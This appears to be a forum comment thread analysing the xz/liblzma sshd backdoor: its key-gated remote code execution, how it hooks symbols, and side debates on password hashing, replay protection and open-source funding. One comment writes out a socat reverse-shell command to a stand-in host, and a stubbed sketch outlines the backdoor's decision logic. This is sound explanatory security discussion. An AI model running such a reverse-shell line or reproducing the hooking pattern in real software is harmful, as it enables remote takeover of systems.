Using a jump host could help, only allowing port forwarding. Ideally it would be heavily monitored and create a new instance for every connection (e.g., inside a container).
The attacker would then be stuck inside the jump host and would have to probe where to connect next. This hopefully would then trigger an alert, causing some suspicion.
A shared instance would allow the attacker to just wait for another connection and then follow its traces, without risking triggering an alert by probing.
The ideal jump host would allow freezing the running ssh process on an alert, either with a snapshot (VM based) or checkpointing (container based), so it can be analyzed later.
Make absolutely sure to include `-a` so it doesn't nuke your env file, and generally speaking, one should upgrade to a version without the malicious code and restart, of course.
I wonder if the malicious code would've installed a more permanent backdoor elsewhere that would remain after a restart.
I recall things like on windows where malware would replace your keyboard drivers or mouse drivers with their own ones that had the malware/virus, so that even if the original malware is removed, the system is never safe again. You'd have to wipe. And this is not even counting any firmware that might've been dropped.
This is a good example of bad logic. It doesn't reek of anything except high quality work. You have an unacknowledged assumption that only nation state actors are capable of high quality work. I think that ultimately you want it to be nation state actors and therefore you see something that a nation state actor would do, so you backtrack that it is a nation state actor. So logically your confirmation bias leads you to affirm the consequent.
I only say this because I'm tired of seeing the brazen assertions of how this has to be nation-state hackers. It is alluring to have identified a secret underlying common knowledge. That's why flat-earthers believe they've uncovered their secret, or chemtrail believers have identified that secret, or anti-vaxxers have uncovered the secret which underlies vaccines. But the proof just isn't there. Don't fall into the trap they fell into.
Can someone explain succinctly what the backdoor does? Do we even know yet? The backdoor itself is not a payload, right? Does it need a malicious archive to exploit it? Or does it hook into the sshd process to listen for malicious packets from a remote attacker?
The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Basically, how does an attacker control a machine with this backdoor on it?
You can imagine a door that opens if you knock on it just right. For anyone without the secret knock, it appears and functions as a wall. Without the secret knock, there might not even be a way to prove it opens at all.
This is sort of the situation here. xz tries to decode some data before it does anything shady; since the scheme is asymmetric, it can do the check with just the public counterpart embedded, without ever containing the attacker's secret key.
The exploit code may never be available, because it is not practical to find the secret key, and it doesn't do anything obviously different if the payload doesn't decrypt successfully. The only way to produce the exploit code would be if the secret key is found somehow; and the only real way for that to happen would be for the people who developed the backdoor to leak it.
Private key. In cryptography we distinguish keys which are symmetric (needed by both parties and unavailable to everyone else) as "Secret" keys, with the pair of keys used in public key cryptography identified as the Private key (typically known only to one person/ system/ whatever) and Public key (known to anybody who cares)
Thus, in most of today's systems your password is a secret. You know your password and so does the system authenticating you. In contrast, the crucial key for a web site's HTTPS is private. Visitors don't know this key, the people issuing the certificate don't know it; only the site itself has the key.
I remember this by the lyrics to "The Fly" by the band U2, "They say a secret is something you tell one other person. So I'm telling you, child".
I don't think I can take seriously in this context a quote in which certificates (a type of public document) are also designated "secrets".
Like, sure, they're probably thinking of PKCS#12 files which actually have the private key inside them, not just the certificate, but when they are this sloppy of course they're going to use the wrong words.
I have often seen the secret component of an asymmetric key pair referred to as a secret key as well. See libsodium, for example. Maybe it's because curve/ed25519 secrets are 32 random bytes, unlike RSA keys, which have a specific structure that makes them distinct from generic secrets.
> You know your password and so does the system authenticating you.
Nitpick, but no it shouldn’t.
The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
The difference is that there are no two passwords that collide, but there are hashes that may.
And two identical passwords from two different users are not necessarily recoverable by someone with the hash list, because they are modified at rest with salts.
To really nitpick, the server does have the password during authentication. The alternative would be a PAKE, which is currently quite rare (but probably should become the standard).
I am aware of PAKEs, and I decided not to waste my time mentioning them because as usual the situation is:
- Using a PAKE correctly would be safe, but that sounds like work.
- Just saying "use a good password" is no work, and you can pretend it's just as safe.
Real world systems using a PAKE are very rare. The most notable is WPA3 (and there are numerous scenarios where it's for nothing until WPA2 is long obsolete). Lots of systems which would use a PAKE if designed by a cryptographer were instead designed by engineers or managers for whom "Ooh, a hash with salt" sounds like a sophisticated modern technical solution rather than a long obsolete one.
> You never submit your password, you submit that hash and they compare it.
That's not true. If that were the case, the hash would now be the password, and the server would be storing it in clear text. It defeats the entire purpose of hashing passwords.
Side note: that is (almost) how NTLM authentication works and why pass-the-hash is a thing in Windows networks.
> Nitpick, but no it shouldn’t.
The HASH of your password is recorded. You never submit your password, you submit that hash and they compare it.
Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
> Nitpick, but the password is submitted as-is by most client applications, and the server hashes the submitted password and compares it with the hash it has (of course, with salting).
I never understood why clients are coded this way. It's trivially easy to send the salt to the client and have it do the hashing. Though I guess it doesn't really improve security in a lot of cases, because if you successfully MITM a web app you can just serve a compromised client.
> I never understood why clients are coded this way.
Because it makes things less secure. If it were sufficient to send the hash to the server to authenticate, and the server simply compared the hash sent by the user with the hash in its database, then the hash is effectively the password. An attacker doesn't need to know the password anymore, as the hash is sufficient.
Hashing was introduced precisely because some vulnerabilities allow read access to the database. With hashed passwords, the attacker in such a situation has to perform a password guessing attack first to proceed. If it was sufficient to send the hash for authentication, the attacker would not need to guess anything.
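To make the conventional flow concrete (the server stores a salted hash, re-hashes whatever the client submits, and compares), here is the classic POSIX crypt(3) pattern. This is only a sketch: a real deployment should use a modern memory-hard scheme (argon2/scrypt/bcrypt) and a constant-time comparison.

    /* verify.c - sketch of server-side password verification with crypt(3).
     * The stored hash string embeds its own salt and algorithm id, so passing
     * it as the second argument makes crypt() re-hash the submitted password
     * the same way. Link with -lcrypt. */
    #include <crypt.h>
    #include <string.h>

    /* Returns 1 if the submitted plaintext password matches the stored hash. */
    int password_ok(const char *submitted, const char *stored_hash)
    {
        const char *rehashed = crypt(submitted, stored_hash);
        if (rehashed == NULL)
            return 0;
        /* A real implementation should compare in constant time. */
        return strcmp(rehashed, stored_hash) == 0;
    }

Note the plaintext only exists transiently on the server during verification; what sits in the database is the salted hash.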
I could be wrong, but my understanding is that it isn't even a door. It simply allows anyone who has a certain private key to send a payload that the server will execute. This won't produce any audit trail of someone logging in, you won't see any session, etc.
Any Linux with this installed would basically become a bot that can be taken over. Perhaps they could send a payload to make it DDoS another host, or payload to open a shell or payload that would install another backdoor with more functionality, and to draw attention away from this one.
It looks like the exploit path calls system() on attacker supplied input, if the check passes. I don't think we need to go into more detail than "it does whatever the attacker wants to on your computer, as root".
In a way this is a really responsible backdoor. In the end this is even less dangerous than most unreported 0-days collected by public and private actors. Absurdly, I would feel reasonably safe with the compromised versions. Somebody selling botnet hosts would never be so careful to limit collateral damage.
I understand that we may never see the secret knock, but shouldn't we have the door and what's behind it by now? Doesn't this mean that the code is quite literally too hard for a human being to figure out? It's not like he can send a full new executable binary that he simply executes - then we'd see that the door is e.g. the exec() call. Honestly this attempt makes me think that the entire C/C++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like openssh, but they're possible because it's written in C/C++.
Nothing here is something that could not be done in other languages. For example, in Rust, auditing this kind of supply chain attack is even more nightmarish if the project uses crates, as crates are often very small, causing the "npm effect".
Another good example is Docker images. The way people often build Docker images is not from the bottom up: the bottom layer(s) is/are often some arbitrary image from an arbitrary source, which creates a huge supply chain attack risk.
All analogies are flawed, and we are rapidly approaching the point of madness.
Still, let me try. In this case, someone on the inside of the building looked in a dusty closet and saw a strange pair of hinges on the wall of the closet. Turns out that the wall of the closet is an exterior wall adjoining the alley back behind the building! At least they know which contractor built this part of the building.
Further examination revealed the locking mechanism that keeps the secret door closed until the correct knock is used. But because the lock is based on the deep mathematics of prime numbers, no mere examination of the lock will reveal the pattern of knocks that will open it. The best you could do is sit there and try every possible knocking pattern until the door opens, and that would take the rest of your life, plus the rest of the lifetime of the Earth itself as well.
Incidentally, I could write the same exploit in rust or any other safe language; no language can protect against a malicious programmer.
As for detecting use of the back door, that's not entirely out of the question. However, it sounds like it would not be as easy as logging every program that sshd calls exec on. But the audit subsystem should notice and record the activity for later use in your post-mortem investigation.
This is literally what the top post link is about. The backdoor functionality has been (roughly) figured out: after decryption and signature verification, it passes the payload received in the signing key of the client's authentication certificate to system().
C/C++ is not a problem here because sshd has to run things to open sessions for users.
The payload is simply remote code execution. But we'll never know the secret knock that triggers it, and we can't probe existing servers for the flaw because we don't know the secret knock.
I imagine that we could in short order build ourselves a modified version of the malware, which contains a different secret knock, one that we know in advance, and then test what would have happened with the malware when the secret knock was given. But this still doesn't help us probe existing servers for the flaw, because those servers aren't running our modified version of the malware, they're running the original malware.
> Honestly this attempt makes me think that the entire c/c++ language stack and ecosystem is the problem. All these software shenanigans should not be needed in a piece of software like openssh but it's possible because it's written in c/c++.
Nothing about this relies on a memory safety exploit. It's hard to figure out because it's a prebuilt binary and it's clever. Unless you meant "all compiled languages" and not C/C++ specifically, it's irrelevant.
The right thing to argue against based on your instinct (no one can figure out what is going on) is: it should be unacceptable for there to be prebuilt binaries committed to the source code.
The "stuff behind the door" is conveniently uploaded with the secret knock. It's not there, and it never will be, because it's remotely executed without being written down. The attacker sends executable code, signed and encrypted (or only one of them? It doesn't matter) with their private key. The door checks anything incoming for a match with the public key it has and executes when happy.
C++ has nothing to do with this; it's the dynamic linking mechanism that grants trusted code the kind of access used here (talking about the hooking that makes the key check possible, not about the execution that comes after - that part is even more mundane, code can execute code, it's a von Neumann architecture after all).
It's not too hard to figure out. People are figuring it out. If anything is too hard, it's due to obfuscation - not C/C++ shenanigans.
As far as I understand from scrolling through these comments, an attacker can send a command that is used with the system() libc call. So the attacker basically has a root shell.
The people who are busy inserting backdoors into all the "rewrite it in Rust" projects, where anonymous, never-heard-from-before, new-to-programming randos rewrite long-trusted, high-security projects in Rust, would presumably very much like everyone else's attention directed elsewhere.
It's okay, the Cargo Lords promise me that because they require a git-hub account and agreeing to the git-hub terms of service before contributing, everything will be okay.
1. sshd starts and loads the libsystemd library which loads the XZ library which contains the hack
2. The XZ library injects its own versions of functions in openssl that verify RSA signatures
3. When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
4. The certificate, in turn, can contain arbitrary data that in a normal login process would include assertions about username or role that would be used to determine if the certificate is valid for use logging in as the particular user. But if the hacked functions detect that the certificate was signed by a specific attacker key, they take some subfield of the certificate and execute it as a command on the system in the sshd context (ie, as the root user).
Unfortunately, we don’t know the attacker’s signing key, just the public key the hacked code uses to validate it. But basically this would give the attacker a way to run any command as root on any compromised system without leaving much of a trace, beyond the (presumably failed) login attempt, which any system on the internet will be getting a lot of anyway.
Is there really a failed login attempt? If it never calls the real functions of sshd in the case of their own cert+payload, why would sshd log anything or even register a login attempt? Or does the backdoor function hook in after sshd has already logged things?
I think it would depend on logging level, yeah. I’ve not seen one way or another whether it aborts the login process or prevents logging, but that’s possible, and would obviously be a good idea. Then the question would be if you could detect the difference between a vulnerability-aborted login attempt and just a malformed/interrupted login attempt.
But in the case of this specific attack, probably the safest approach would be to watch and track what processes are being spawned by sshd. Which in retrospect is probably advisable for any network daemon. (Of course, lots of them will be sloppy and messy with how they interact with the system, and it might be next to impossible to tell attacks from "legit" behavior. But sshd is probably easier to pin down to what's "safe" or not.)
> When someone logs into SSH and presents a signed SSH certificate as authentication, those hacked functions are called
So if I only use pubkey auth and ED25519, there's no risk?
Besides this, just to understand it better, if someone tries to login to your server with the attacker's certificate, the backdoor will disable any checks for it and allow the remote user to login as root (or any other arbitrary user) even if root login is disabled in sshd config?
I don’t think we know enough to be sure even disabling certificate auth would prevent this. But from what I can tell it probably wouldn’t directly allow arbitrary user login. It only seems to allow the execution of an arbitrary command. But of course that command might do something that would break any other security on the system.
But, one clever thing about this attack is that the commands being run wouldn’t be caught by typical user-login tracking, since there’s no “login”. The attacker is just tricking sshd into running a command.
I don't think we know exactly what this does yet. I can only answer one of those questions; as far as I understand, the "unreplayable" part is referring to this:
> Apparently the backdoor reverts back to regular operation if the payload is malformed or *the signature from the attacker's key doesn't verify*.
emphasis mine, note the "signature of the attacker's key". So unless that key is leaked, or someone breaks the RSA algorithm (in which case we have far bigger problems), it's impossible for someone else (researcher or third-party) to exploit this backdoor.
Replayability means something different in this context. First, we do know the backdoor will pass the payload to system, so in general it is like an attacker has access to bash, presumably as root since it is sshd.
Replayability means, if someone were to catch a payload in action which did use the exploit, you can’t resend the attacker’s data and have it work. It might contain something like a date or other data specific only to the context it came from. This makes a recorded attack less helpful for developing a test… since you can’t replay it.
> It might contain something like a date or other data specific only to the context it came from.
In all these modern protocols, including SSHv2 / SecSH (Sean Connery fans at the IETF evidently) both parties deliberately introduce random elements into a signed conversation as a liveness check - precisely to prevent replaying previous communications.
TLS 1.3's zero round-trip (0-RTT) mode cannot do this, which is why it basically says you'd better be damn sure you've figured out exactly why it's safe to use, including every weird replay scenario and why it's technically sound in your design, or else you must not enable it. We may yet regret the whole thing and just tell everybody to refuse it.
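As a toy illustration of the liveness idea (not any real protocol): the verifier contributes fresh randomness, accepts a response only while that exact challenge is outstanding, and then retires it, so a recorded exchange can't be accepted twice. In SSH/TLS the challenge is additionally bound under the peer's signature; that part is omitted here.

    /* liveness.c - toy one-shot challenge/response, illustration only. */
    #include <stdint.h>
    #include <string.h>
    #include <sys/random.h>

    static uint8_t current_challenge[32];
    static int challenge_outstanding;

    /* Verifier: issue a fresh random challenge for this exchange only. */
    int issue_challenge(uint8_t out[32])
    {
        if (getrandom(current_challenge, sizeof current_challenge, 0) != 32)
            return -1;
        memcpy(out, current_challenge, sizeof current_challenge);
        challenge_outstanding = 1;
        return 0;
    }

    /* Verifier: accept a response only if it echoes the still-outstanding
     * challenge, then retire it so a replayed copy is rejected. */
    int accept_response(const uint8_t echoed[32])
    {
        if (!challenge_outstanding ||
            memcmp(echoed, current_challenge, sizeof current_challenge) != 0)
            return 0;
        challenge_outstanding = 0;
        return 1;
    }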
What could be done, I think, is patch the exploit into logging the payload (and perhaps some network state?) instead of executing it, so it can be analysed - in the unlikely case that the owner of the key would still try their luck using it on a patched system after discovery.
What it does: it's full RCE, remote code execution, it does whatever the attacker decides to upload. No mystery there.
it does whatever the decrypted/signed payload tells the backdoor to execute - it's sent along with the key.
The backdoor is just that - a backdoor to let in that payload (which will have come from the attacker in the future when they're ready to use this backdoor).
Or very untargeted. Something intended just to lie dormant, on the chance that it succeeded...
It is a very good backdoor to have if, at whatever point, you have dozens of options: see sshd running, test this; if it works you are done, if not move on to something else.
This looks like a state-sponsored attack. Imagine having a backdoor that lets you go to any Linux server and, with your key, make it execute any code you wish without any audit trail. And no one without the key can do it, so even if your citizens use such a vulnerable system, other states won't be able to use your backdoor.
My understanding is that we know somehow already what the exploit allows the attacker to do - we just can't reproduce it because we don't have their private key.
Technically, we can modify the backdoor and embed our own public key - but there is no way to probe a random server on the internet and check if it's vulnerable (from a scanner perspective).
In a certain way it's a good thing - only the creator of the backdoor can access your vulnerable system...
It's a NOBUS (Nobody But Us can use it) attack. The choice to use a private key means it's possible that even the person who submitted the tampered code doesn't have the private key, only some other entity controlling them does.
I know what replayable means. But even with your explanation of what makes it unreplayable it's not strictly true: you could replay the attack on the server it was originally played against.
Sure. But the interest is in being able to talk to server B to figure out if it's vulnerable; that's impossible, because the attack can't be replayed to it.
> The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available? Surely if we can reverse the code we can write a PoC?
Not if public-key cryptography was used correctly, and if there are no exploitable bugs.
We understand it completely. However, since determining the private key that corresponds to the public key embedded in the backdoor is practically infeasible, we can't actually exercise it. Someone could modify the code with a known ed448 private key and exercise it, but the point of having the PoC is to scan the internet and find vulnerable servers.
> The OP makes it sound like an attacker can send a malicious payload in the pre-auth phase of an SSH session - but why does he say that an exploit might never be available?
The exploit as shipped is a binary (cleverly hidden in the test data), not source. And it validates the payload against a key pair whose private half isn't known to the public. Only the attacker can exercise the exploit currently, making it impossible to scan for (well, absent second-order effects like performance, which is how it was discovered).
That's the most interesting part. No, we don't know it yet. The backdoor is so sophisticated that none of us can fully understand it. It is not a “usual” security bug.
What makes you say that? I haven't started reverse engineering it myself, but from all I have read, the people who did have a very good understanding of what it does. They just can't use it themselves, because they would need the attacker's private key.
Yeah, these types of security issues will be used by politicians to force hardware makers to lock down hardware and embed software in chips.
The go-fast startup habit of "import the world to build my company's products" is a huge security issue IT workers ignore.
The only solution politics and big tech will chase is to obsolete said job market by pulling more of the stack into locked-down hardware, with updates only allowed to come from the gadget vendor.
Like you said, it has firmware which is flashable. Secure enclaves are never 100% secure, but if only, for example, Apple can upload to them, it dramatically reduces the risk of some random open source project being git-pulled in. Apple may still pull in open source, but they would be on the hook to avoid this.
Open source's days of declaring "use at your own risk" have become a liability in this hyper-networked society. It's now becoming part of the problem it was imagined up to solve.
The NSA demands that Intel and AMD provide backdoor ways to turn off the IME/PSP, which are basically a small OS running in a small processor inside your processor. So the precedent is that the government wants less embedded software in their hardware, at least for themselves.
If we relied on gadget vendors to maintain such software, I think we can just look at any IoT or router manufacturer to get an idea of just how often and for how long they will update the software. So that idea will probably backfire spectacularly if implemented.
IME has privileged access to the MMU(s), all system memory, and even out-of-band access to the network adapter, such that the OS cannot inspect network traffic originating with or destined for the IME.
Lots. It's basically an extra processor that runs at all times, even when your computer is supposedly "off." Its firmware is bigger than you'd think, like a complete Unix system big. It's frankly terrifying how powerful and opaque it is. It provides a lot around remote management for corporations, lots of "update the BIOS remotely" sort of features, and also a bunch of those stupid copy protection enforcement things. Plus some startup/shutdown stuff like Secure Boot.
Why would "embed software in chips" be a solution?
If anything, I'd expect it to be an even bigger risk, because when (not if) a security issue is found in the hardware, you now have no way to fix it, other than throwing out this server/fridge/toothbrush or whatever is running it.
A flashable secure enclave segment in the hardware stack is an option to patch around embedded bugs.
I haven’t worked in hardware design since the era of Nortel, and it was way different back then but the general physics are the same; if, else, while, and math operations in the hardware are not hard.
In fact your hardware is a general while loop: while it has power, iterate around refreshing these memory states with these computed values, even in the absence of user input (which at the root is turning it on).
Programmers have grown accustomed to being necessary to running ignorant business machines but that’s never been a real requirement. Just a socialized one. And such memes are dying off.
Which will make updates either expensive or impossible. You will be able to write books about exploitable bugs in the hardware, and those books will easily survive several editions.
Siblings saying "we don't know" haven't really grokked the post, I don't think.
If I'm understanding the thread correctly, here's a (not so) succinct explanation. Please, if you know better than I do, correct me if I've made an error in my understanding.
`system()` is a standard C function that takes a string as input and runs it through `sh`, like so:
sh -c "whatever input"
It's used as a super rudimentary way to run arbitrary shell commands from a C program, using the `execl()` call under the hood, just like you'd run them on a bash/sh/fish/zsh/whatever command line.
system("echo '!dlroW ,olleH' | rev");
Those commands run mostly in the same privilege context as the process that invoked `system()`. If the call to `system()` came from a program running as root, the executed command is also run as root.
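As a rough sketch of what `system()` does under the hood (glibc's real implementation additionally fiddles with SIGINT/SIGQUIT/SIGCHLD and has more error handling):

    /* my_system.c - simplified sketch of system(3). */
    #include <sys/wait.h>
    #include <unistd.h>

    int my_system(const char *command)
    {
        pid_t pid = fork();
        if (pid < 0)
            return -1;

        if (pid == 0) {
            /* Child: hand the string to the shell. It inherits the parent's
             * user/group IDs, which is why a payload reaching system() inside
             * a root sshd runs as root. */
            execl("/bin/sh", "sh", "-c", command, (char *)NULL);
            _exit(127);                     /* exec failed */
        }

        int status;
        if (waitpid(pid, &status, 0) < 0)   /* parent waits for the shell */
            return -1;
        return status;
    }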
The backdoor utilizes this function in the code that gets injected into `sshd` by way of liblzma.so, a library for the LZMA compression algorithm (commonly associated with the `.xz` extension). Jia Tan, the person at the center of this whole back door, has been a maintainer of that project for several years now.
Without going too much into how the injected code gets into the `sshd` process: the back door inserts itself into the symbol lookup process earlier than other libraries, such as libcrypto/OpenSSL. What this means is (and I'm over-simplifying a lot): when the process needs to map usages of e.g. `SSL_decrypt_key()` that were linked against dynamic libraries (as opposed to being statically linked and thus included directly in `sshd`) to real functions, it does a string-wise lookup to see where it can find them.
It runs through a list of dynamic libraries that might have it and sees if they export it. If they do, it gets the address of the exported function and remembers where it's at so that further calls to that function can be found quickly, without another search. This is how DLLs and SOs (dynamic libraries) are linked to the process that needs them at runtime without the process needing to know exactly where the functions that they need are located.
The back door hijacks this mechanism to insert its own functions in some of those places, so that when `sshd` thinks it's calling `SSL_decrypt_key()`, it's really calling some malicious function in the back door - which can then choose to do something with the data passed to the function call, or it can choose to forward the call to the real function.
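The backdoor installs its hook by rewriting resolved entries from inside its IFUNC resolver, before the linker finishes and write-protects its tables, which is far more involved than anything you'd normally write. But as a rough illustration of the general idea of interposing on a dynamically resolved symbol, the familiar LD_PRELOAD + dlsym(RTLD_NEXT) trick looks like this (a benign logging wrapper; the names and build line are mine):

    /* hook.c - benign interposer that logs every system() call, then forwards
     * it to the real libc implementation.
     *   gcc -shared -fPIC -o hook.so hook.c -ldl
     *   LD_PRELOAD=$PWD/hook.so some_program
     * (The xz implant does NOT work this way - there is no extra library to
     * spot in /proc/<pid>/maps - but the symbol-shadowing idea is similar.) */
    #define _GNU_SOURCE
    #include <dlfcn.h>
    #include <stdio.h>

    int system(const char *command)
    {
        /* Find the next definition of "system" in lookup order, i.e. libc's. */
        int (*real_system)(const char *) =
            (int (*)(const char *))dlsym(RTLD_NEXT, "system");

        fprintf(stderr, "[hook] system(\"%s\")\n", command ? command : "(null)");
        return real_system ? real_system(command) : -1;
    }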
The back door makes use of this hijacking when `sshd` needs to validate RSA information passed to the server via a client connection during authentication. An RSA key has a bunch of fields, one of which is the 'n' field - the modulus, part of the public key data itself. OpenSSL implements this as a BIGNUM, a variable-length, potentially very large number. It's more or less read in as a bag of bytes, and its meaning depends on the underlying encryption algorithm. This is the mechanism behind "public key authentication" when connecting to servers, and it is generally more secure than e.g. username/password authentication.
The back door intercepts the call to check the RSA data, pulls out the 'n' parameter, and tries to decrypt it using ChaCha20. There's no way for it to know if it's decrypted beforehand, but generally encryption algorithms have a way to error-check and report failures - that, or you add some well known piece of information into the encrypted data that you can verify once it's decrypted.
Either way, the back door checks to see if it's really an encrypted string. If not, it forwards the call back to the original RSA check mechanism so that sshd can process it normally.
However, if the decryption succeeds, the back door passes the decrypted string to `system()`. This means that a random client connecting to an SSH server can craft an RSA public key that is really an encrypted, malicious payload, which runs an arbitrary shell command as whichever user `sshd` is running as - oftentimes root.
Not only that, but the back door also checks the incoming RSA structure to see if it's coming from the person who made it. This prevents any of us from finding this exploit and using it ourselves, even if we know our target is infected. It's a back door completely exclusive to whoever holds the private key used by the back door to sort of 'authenticate' the exploit itself.
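Putting those last few paragraphs together, the decision logic is roughly the following. To be clear, this is a hypothetical sketch: decrypt_payload() and signed_by_attacker() are invented stand-ins (stubbed so it compiles) for the implant's own ChaCha20 and signature-check code, and the real thing is heavily obfuscated.

    /* sketch.c - hypothetical shape of the hooked verification path. */
    #include <stdlib.h>
    #include <string.h>

    /* Stand-in: try to decrypt the key's 'n' field into a command string. */
    static int decrypt_payload(const unsigned char *n, size_t n_len,
                               char *cmd, size_t cmd_size)
    {
        (void)n; (void)n_len; (void)cmd; (void)cmd_size;
        return 0;   /* stub: "not an attacker payload" */
    }

    /* Stand-in: verify the payload against the attacker's embedded public key. */
    static int signed_by_attacker(const char *cmd) { (void)cmd; return 0; }

    typedef int (*rsa_check_fn)(const unsigned char *n, size_t n_len);
    static rsa_check_fn real_rsa_check;   /* assumed populated when the hook is installed */

    int hooked_rsa_check(const unsigned char *n, size_t n_len)
    {
        char cmd[4096];

        if (decrypt_payload(n, n_len, cmd, sizeof cmd) && signed_by_attacker(cmd)) {
            system(cmd);                  /* RCE as whatever user sshd runs as */
            return 0;                     /* what it reports back hardly matters */
        }

        /* Anything else looks like an ordinary key: defer to the real check,
         * so normal clients see no difference at all. */
        return real_rsa_check(n, n_len);
    }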
This is much worse than what many of us thought it was before - a public key auth bypass - which would have meant that you'd only gain access as a user allowed to log in via SSH. sshd's configuration file has a setting that disables root logins entirely, which is generally enabled on production systems for obvious reasons. However, with this being an RCE, SSH servers running as root would execute the payloads as root.
From there, they could easily run socat and have the system connect to a server of their choice to gain a remote interactive shell, for example:
socat TCP:example.com:1234 SYSTEM:"bash -l"
The possibilities are really endless. They'd effectively have a skeleton key that only they could use (or sell) that, with enough time for people to upgrade their version of `sshd`, would allow them access to just about any SSH server they could connect to, oftentimes with root permissions.
> Siblings saying "we don't know" haven't really grokked the post, I don't think.
The reason for saying "we don't know" is not that we don't understand what's detailed in TFA, but that the backdoor embeds an 88 kB object file into liblzma, and nobody has fully reverse engineered and understood all that code yet. There might be other things lurking in there.
> They'd effectively have a skeleton key that only they could use (or sell) that
This looks more like a state-sponsored attack; it doesn't look like someone joining and at some point realizing they want to implement a backdoor.
The guy joined the project 2 years ago, developed a test framework (which he then used to hide the backdoor binary in - a binary that appears to be complex and that others are still figuring out), then gradually disabled various security checks before activating it.
Thank you for the detailed write up. This made me think, why do we actually let sshd run as root?
Would it be possible to run only a very unsophisticated SSH server as root which, depending on the user specified in the incoming connection, just hands that connection over to a process running as the actual user and lets the real server run there? This could be so simplistic that a backdoor would be more easily detected.
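For context, the part that fundamentally has to stay privileged in that model is small: accept the connection, authenticate, then irreversibly drop to the target user before handing over the session. A bare-bones sketch of just the privilege drop (ignoring the genuinely hard parts: PAM, PTY allocation, environment, sandboxing), where the order of calls matters:

    /* drop_priv.c - bare-bones sketch of dropping from root to a named user
     * before exec'ing their shell. Omits PAM, PTYs, limits, etc. */
    #include <grp.h>
    #include <pwd.h>
    #include <stdio.h>
    #include <unistd.h>

    static int run_as_user(const char *username)
    {
        struct passwd *pw = getpwnam(username);
        if (!pw)
            return -1;

        /* Order matters: supplementary groups, then gid, then uid.
         * Once setuid() succeeds there is no way back to root. */
        if (initgroups(pw->pw_name, pw->pw_gid) != 0) return -1;
        if (setgid(pw->pw_gid) != 0)                  return -1;
        if (setuid(pw->pw_uid) != 0)                  return -1;

        /* From here on, everything runs with the user's privileges only. */
        execl(pw->pw_shell, pw->pw_shell, "-l", (char *)NULL);
        return -1;   /* exec failed */
    }

    int main(int argc, char **argv)
    {
        if (argc != 2) {
            fprintf(stderr, "usage: %s <username>\n", argv[0]);
            return 1;
        }
        return run_as_user(argv[1]) == 0 ? 0 : 1;
    }

OpenSSH already does privilege separation along roughly these lines; the injected code is a problem precisely because it runs in the part that is still root.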
Attacker wants to be able to send an especially crafted public key to their target's server's sshd. That crafted key is totally bogus input, a normal sshd would just probably reject it as invalid. The bits embedded into the key are actually malicious code, encrypted/signed with the attacker's secret key.
In order to achieve their objective, they engineered a backdoor into sshd that hooks into the authentication functions which handle those keys. Whenever someone sends a key, it tries to decrypt it with the attacker's keys. If it fails, proceed as usual, it's not a payload. If it successfully decrypts, it's time for the sleeper agent to wake up and pipe that payload into a brand new process running as root.
It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds. Something's gotta change in OSS. I think one solution could be licenses that force companies/businesses of certain sizes to pay maintenance fees. One idea off the top of my head.
That's why I think such OSS packages should use licenses that force large companies to pay (moderate) fees for maintenance. I assume such sums of money won't even tickle them.
Imagine 10 large companies, each pay $1000 a month for critical packages they use. For each developer, that's $10,000 they can either use to quit their current job or hire another person to share the burden.
You may as well just slap a "no commercial use" restriction on it. It takes months to go through procurement at the average big company, and still would if the package cost $1. Developers at these companies will find something else without the friction.
I'm not an expert on this. If it handles all the legal and other issues big companies need to deal with in a frictionless manner, then that's good. If not, maybe a different solution is needed.
You are conflating convenience with necessity. Currently, large companies also use xz simply because it is configured as the default in many distributions. If it charged them money, they would just move to zstd, brotli, gzip or 7z. The first two are backed by large companies themselves, who will never adopt these kinds of licenses.
Not really. Just make your software AGPLv3. It's literally the most free license GNU and the FSF have ever come up with. It ensures your freedom so hard the corporations cannot tolerate it. Now you have leverage. If the corporations want it so bad, they can have it. They just gotta ask for permission to use it under different terms. Then they gotta pay for it.
All you have to do is not MIT or BSD license the software. When you do that, you're essentially transferring your intellectual property to the corporations at zero cost. Can't think of a bigger wealth transfer in history. From well meaning individual programmers and straight to the billionaires.
The BSD style openness only makes sense in a world without intellectual property. Until the day copyright is abolished, it's either AGPLv3 or all rights reserved. Nothing else makes sense.
The problem is, there will be almost zero packages that (very few) "corporations want so bad". The only exception might be cloud providers, that want to host your mildly-popular open-source message queue, but, again, if you are Amazon, you'll soon just re-implement that message queue, drop the "original" one, and after a couple of years your mildly-popular project will become not popular at all.
> It baffles me how such an important package that so many Linux servers use every day is unmaintained by the original author due to insufficient funds.
Is it actually insufficient funds or is it burnout?
I'm not sure. I know from working on OSS projects personally that insufficient funds can easily lead to burnout as well. You gotta find other sources of revenue while STILL maintaining your OSS project.
The proposed EU Cyber Resilience Act positions itself as a solution. To put it simply, vendors are responsible for vulnerabilities throughout the lifetime of their products, whether that is a firewall or a toaster. Thus, vendors are incentivized to keep OSS secure, whether that means paying maintainers, commissioning code audits or hiring FTEs to contribute.
It baffles me why something as complex as xz is apparently needed. The code for bzip2 is tiny and would need a small fraction of one person to maintain.
Currently if you visit the xz repository it is disabled for violating github's TOS.
While it should clearly be disabled, I feel like GitHub should leave the code and history up, while displaying a banner (and disabling any features that could be exploited), so that researchers and others can learn about the exploit.
In more minor situations when a library is hosting malicious code, if I found the repo to be down I might not think anything of it.
If you are interested in the source code, that is easy to find. This code and git repo are linked all over the world, in many git repos, and the source is bundled many times in releases as well.
As a de facto maintainer of an obscure open source game, I see devs come and go. I just merge all the worthwhile contributions. Some collaborators go pretty deep with their features, with a variety of coding styles, in a mishmash of C and C++. I'm not always across the implementation details, but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed. Lucky the game is so obscure and the attack surface minuscule, but it did stop me from any temptation to sign Windows binaries out of any sense of munificence.
This xz backdoor is just the most massive nightmare, and I really feel for the og devs, and anyone who got sucked in by this.
> but in the back of my mind I'm thinking, man, anyone could just code up some real nasty backdoor and the project would be screwed
That's true of course, but it's not a problem specific to software. In fact, I'm not even sure it's a "problem" in a meaningful sense at all.
